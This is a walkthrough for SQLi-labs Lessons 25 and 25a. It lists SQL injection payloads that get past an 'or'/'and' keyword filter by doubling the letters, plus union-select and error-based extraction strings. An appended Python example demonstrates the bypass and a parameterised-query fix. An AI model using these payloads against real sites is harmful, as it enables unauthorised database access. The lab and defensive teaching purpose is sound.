SQLi-labs: Lesson 25

Error based - Filter "or" and "and"

  1. Doubled "or":
    • ?id=1' oorr '1'='1
    • ?id=1' oorr 1=1--+
  2. Doubled "and":
    • ?id=1' aandnd '1'='1
    • ?id=1' aandnd 1=1--+
  3. Union select also works:
    • ?id=' union select 1, database(),'3
    • ?id=' union select 1, database(),3--+
  4. Extractvalue works: ?id=1' aandnd extractvalue(1,concat('::',version(),'::'))--+
  5. Updatexml works: ?id=1' aandnd updatexml(1, concat(0x5c, @@version),1);--+
  6. NAME_CONST works: ?id=1' aandnd 1=(select * from (select NAME_CONST(version(),1), NAME_CONST(version(),1)) as x);--+

SEE LESSON 17 FOR MORE DETAILS


SQLi-labs: Lesson 25a

Blind based - Filter "or" and "and"

  1. Basic injection:
    • ?id=0 oorr 1=1--+
    • ?id=1 aandnd 1=1--+
  2. Union select:
    • ?id=0 union select 1,database(),3--+
    • ?id=0 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3--+

SEE LESSON 23 FOR MORE DETAILS
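
Why the doubled spellings in Lessons 25 and 25a survive the filter, and what the fix looks like, as an added example that is not part of the original page or the lab's code. It assumes the filter removes "or" and "and" in one case-insensitive pass each, which is what the payloads above imply; `strip_once`, the `users` table and its rows are constructed for illustration.

```python
import re
import sqlite3


def strip_once(value: str) -> str:
    # Assumed model of the lesson's filter: one case-insensitive pass per keyword.
    value = re.sub("or", "", value, flags=re.I)
    return re.sub("and", "", value, flags=re.I)


def make_db() -> sqlite3.Connection:
    # Constructed sample data, not the lab's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("1", "alice"), ("2", "bob"), ("3", "carol")])
    return conn


def lookup_filtered(conn, raw_id):
    # Weak: the filtered input is still concatenated into the SQL text.
    sql = "SELECT username FROM users WHERE id='" + strip_once(raw_id) + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, raw_id):
    # Corrected: the value is bound as data and never parsed as SQL.
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE id=?", (raw_id,))]


if __name__ == "__main__":
    conn = make_db()
    # Inputs taken from the lists above, plus one benign id.
    for raw in ["1", "1' oorr '1'='1", "1' aandnd '1'='1"]:
        print(repr(raw), "->", repr(strip_once(raw)),
              lookup_filtered(conn, raw), lookup_bound(conn, raw))
    # The same pass rebuilds a table name and mangles an ordinary value.
    print(strip_once("infoorrmation_schema"), strip_once("Orlando"))
```

Keyword stripping fails in both directions: removing the inner match reassembles the keyword from the outer characters, and legitimate values that contain "or" or "and" are corrupted. The bound query needs no filter.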
